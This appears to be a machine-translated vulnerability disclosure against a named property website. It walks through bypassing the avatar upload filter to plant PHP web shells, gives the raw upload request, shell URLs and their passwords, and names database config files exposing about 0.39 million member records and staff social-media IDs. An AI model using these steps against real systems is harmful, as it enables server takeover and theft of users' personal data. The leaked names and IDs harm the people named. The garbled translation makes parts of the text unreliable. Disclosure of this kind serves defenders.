The uploading and filtering of a website in chainjia property is not strict, resulting in leakage of about 0.4 million of Getshell accounts.

The uploading and filtering of a website in chainjia property is not strict, resulting in leakage of about 0.4 million of Getshell accounts.

A website of chainjia property is not strictly filtered, causing leakage of Getshell + approximately 0.4 million accounts

Site: http://www.fang360.com

In http://test.fang360.com

Prove that it is your website. What is the contact email address?
 

Register an account and modify the Avatar in account settings.

Http://test.fang360.com/index.php? App = user & ac = set & ts = face
 

Then, capture the packet and upload the PHP file at the last 00.
 

POST /index.php?app=user&ac=do&ts=setface HTTP/1.1Host: test.fang360.comProxy-Connection: keep-aliveContent-Length: 217Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://test.fang360.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 LBBROWSERContent-Type: multipart/form-data; boundary=----WebKitFormBoundary4M6hxmPAjXV0QbkiReferer: http://test.fang360.com/index.php?app=user&ac=set&ts=faceAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=nrf41978q7n7p1jlgq845a1su3; __utmt=1; CNZZDATA30047478=cnzz_eid%3D430962145-1436167254-http%253A%252F%252F210.51.167.94%252F%26ntime%3D1436167254; __utma=230179737.1765253530.1436167363.1436167363.1436167363.1; __utmb=230179737.18.10.1436167363; __utmc=230179737; __utmz=230179737.1436167363.1.1.utmcsr=210.51.167.94|utmccn=(referral)|utmcmd=referral|utmcct=/index.php------WebKitFormBoundary4M6hxmPAjXV0QbkiContent-Disposition: form-data; name="picfile"; filename="web.php

Find the Avatar, and copy the Avatar address to the php address in one sentence.

Http://test.fang360.com/cache/user/0/0/48/e3b45ae09c_48_48.php password :pass
 

It seems that our predecessors have already been here...

Http://test.fang360.com/cache/user/0/0/48/40676d5140_48_48.php password: pwd
 

There is also a hidden
 

#2 Databases

/Home/fang360/api/uc_config.php, which contains a total of 0.39 million member information.

/Home/fang360/data/config. inc. php, with hundreds of accounts and passwords leaked
 

$TS_DB['sql']='0';$TS_DB['host']='localhost';$TS_DB['user']='*******';$TS_DB['pwd']='**m*****';$TS_DB['name']='*******';$TS_DB['pre']='le_';define('dbprefix','le_');

 

 

Here, we will emphasize that this is the site of the chain house.

/Home/fang360/app/weibo/config_v2.php
 

 '{"Id": xxxxx, "name": "zuohui"}'), */$ _ qs = array ('4' => '{"id ": 1794759982, "name": "Zuo Hui"} '), array ('4' =>' {"id": 1738713232, "name ": "chain home Lin Qian"} '), array ('4' =>' {"id": 1883886237, "name": "chain home ghost shizhao "}'), array ('4' => '{"id": 1940176510, "name": "Chengdu chain Home Zhang Haiming "}'), array ('4' => '{"id": 1904274393, "name": "Shanghai Chain home Song chunhui "}'), array ('4' => '{"id": 1883875283, "name": "chain home Li yanfeng "}'), array ('4' => '{"id": 2188488543, "name": ""}'), array ('4' => '{"id ": 1893873097, "name": "Nanjing chain home Huang yueping "}'));

No.

Homepage: Weibo: http://weibo.com/1934724075/ to http://weibo.com/bjhomelink
 

 

Solution:

Filter